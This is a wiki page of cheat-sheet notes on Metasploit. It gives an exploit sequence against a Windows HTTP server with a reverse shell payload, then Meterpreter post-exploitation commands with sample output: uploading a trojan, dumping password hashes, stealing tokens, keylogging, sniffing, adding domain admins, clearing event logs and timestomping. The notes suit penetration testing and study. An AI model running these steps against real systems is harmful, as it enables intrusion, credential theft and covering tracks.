Metasploit

From Linuxmemo.


Revision of 29 August 2012, 13:40


shell

help, info, set, show and use.

show exploits
search 
use windows/http/savant_31_overflow
show options
set RHOST 192.168.1.5
show targets
set TARGET 0
show payloads
set PAYLOAD windows/shell/reverse_nonx_tcp
show options
exploit

show options Displays the list of options and their current values (those specified with the set command)

show exploits Displays the list of exploits

show targets Displays the list of targets

show payloads Displays the list of available payloads

show advanced Displays the advanced options

Module tree

Auxiliary Version 3.0 supports the concept of auxiliary modules, which can be used to perform arbitrary actions such as port scanning and denial of service, among others.

Encoder

Exploit "Exploit" modules are the main modules in Metasploit.

Nop NOP modules provide "no-operation" instructions used when exploiting buffer overflows.

Payload Payloads are pieces of code (shellcode) executed when the exploit succeeds. Payloads provide the communication channel between Metasploit and the victim.

meterpreter

  • help
The 'help' command, as may be expected, displays the Meterpreter help menu.
meterpreter > help
Core Commands
=============
   Command       Description
   -------       -----------
   ?             Help menu
   background    Backgrounds the current session
   channel       Displays information about active channels
...snip...


  • background
The 'background' command will send the current Meterpreter session to the background and return you to the msf prompt. To get back to your Meterpreter session, just interact with it again.
meterpreter > background
msf exploit(ms08_067_netapi) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >
  • ps
The 'ps' command displays a list of running processes on the target.
meterpreter > ps
Process list
============
   PID   Name                  Path
   ---   ----                  ----
   132   VMwareUser.exe        C:\Program Files\VMware\VMware Tools\VMwareUser.exe
   152   VMwareTray.exe        C:\Program Files\VMware\VMware Tools\VMwareTray.exe
   288   snmp.exe              C:\WINDOWS\System32\snmp.exe
...snip...


  • migrate
Using the 'migrate' post module, you can migrate to another process on the victim.
meterpreter > run post/windows/manage/migrate 
[*] Running module against V-MAC-XP
[*] Current server process: svchost.exe (1076)
[*] Migrating to explorer.exe...
[*] Migrating into process ID 816
[*] New server process: Explorer.EXE (816)
meterpreter >
  • ls
As in Linux, the 'ls' command will list the files in the current remote directory.
meterpreter > ls
Listing: C:\Documents and Settings\victim
=========================================
Mode              Size     Type  Last modified                   Name
----              ----     ----  -------------                   ----
40777/rwxrwxrwx   0        dir   Sat Oct 17 07:40:45 -0600 2009  .
40777/rwxrwxrwx   0        dir   Fri Jun 19 13:30:00 -0600 2009  ..
100666/rw-rw-rw-  218      fil   Sat Oct 03 14:45:54 -0600 2009  .recently-used.xbel
40555/r-xr-xr-x   0        dir   Wed Nov 04 19:44:05 -0700 2009  Application Data
...snip...


  • download
The 'download' command downloads a file from the remote machine. Note the use of the double-slashes when giving the Windows path.
meterpreter > download c:\\boot.ini
[*] downloading: c:\boot.ini -> c:\boot.ini
[*] downloaded : c:\boot.ini -> c:\boot.ini/boot.ini
meterpreter >


  • upload
As with the 'download' command, you need to use double-slashes with the 'upload' command.
meterpreter > upload evil_trojan.exe c:\\windows\\system32
[*] uploading  : evil_trojan.exe -> c:\windows\system32
[*] uploaded   : evil_trojan.exe -> c:\windows\system32\evil_trojan.exe
meterpreter >


  • ipconfig
The 'ipconfig' command displays the network interfaces and addresses on the remote machine.
meterpreter > ipconfig
MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address  : 127.0.0.1
Netmask     : 255.0.0.0
AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC: 00:0c:29:10:f5:15
IP Address  : 192.168.1.104
Netmask     : 255.255.0.0
meterpreter >


  • getuid
Running 'getuid' will display the user that the Meterpreter server is running as on the host.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >


  • execute
The 'execute' command runs a command on the target.
meterpreter > execute -f cmd.exe -i -H
Process 38320 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>


  • shell
The 'shell' command will present you with a standard shell on the target system.
meterpreter > shell
Process 39640 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>


  • idletime
Running 'idletime' will display the number of seconds that the user at the remote machine has been idle.
meterpreter > idletime
User has been idle for: 5 hours 26 mins 35 secs
meterpreter >


  • hashdump

The 'hashdump' post module will dump the contents of the SAM database.

help

Open Meterpreter usage help

run scriptname

Run Meterpreter-based scripts; for a full list check the scripts/meterpreter directory

sysinfo

Show the system information on the remote target

ls

List the files and folders on the target

use priv

Load the privilege extension for extended Meterpreter libraries

ps

Show all running processes and which accounts are associated with each process

migrate PID

Migrate to the specific process ID (PID is the target process ID gained from the ps command)

use incognito

Load incognito functions. (Used for token stealing and impersonation on a target machine)

list_tokens -u

List available tokens on the target by user

list_tokens -g

List available tokens on the target by group

impersonate_token DOMAIN_NAME\\USERNAME

Impersonate a token available on the target

steal_token PID

Steal the tokens available for a given process and impersonate that token

drop_token

Stop impersonating the current token

getsystem

Attempt to elevate permissions to SYSTEM-level access through multiple attack vectors

shell

Drop into an interactive shell with all available tokens

execute -f cmd.exe -i

Execute cmd.exe and interact with it

execute -f cmd.exe -i -t

Execute cmd.exe with all available tokens

execute -f cmd.exe -i -H -t

Execute cmd.exe with all available tokens and make it a hidden process

rev2self

Revert back to the original user you used to compromise the target

reg command

Interact, create, delete, query, set, and much more in the target’s registry

setdesktop number

Switch to a different screen based on who is logged in

screenshot

Take a screenshot of the target’s screen

upload file

Upload a file to the target

download file

Download a file from the target

keyscan_start

Start sniffing keystrokes on the remote target

keyscan_dump

Dump the remote keys captured on the target

keyscan_stop

Stop sniffing keystrokes on the remote target

getprivs

Get as many privileges as possible on the target

uictl enable keyboard/mouse

Take control of the keyboard and/or mouse

background

Run your current Meterpreter shell in the background

hashdump

Dump all hashes on the target

use sniffer

Load the sniffer module

sniffer_interfaces

List the available interfaces on the target

sniffer_dump interfaceID pcapname

Start sniffing on the remote target

sniffer_start interfaceID packet-buffer

Start sniffing with a specific range for a packet buffer

sniffer_stats interfaceID

Grab statistical information from the interface you are sniffing

sniffer_stop interfaceID

Stop the sniffer

add_user username password -h ip

Add a user on the remote target

add_group_user "Domain Admins" username -h ip

Add a username to the Domain Administrators group on the remote target

clearev

Clear the event log on the target machine

timestomp

Change file attributes, such as creation date (antiforensics measure)

reboot

Reboot the target machine
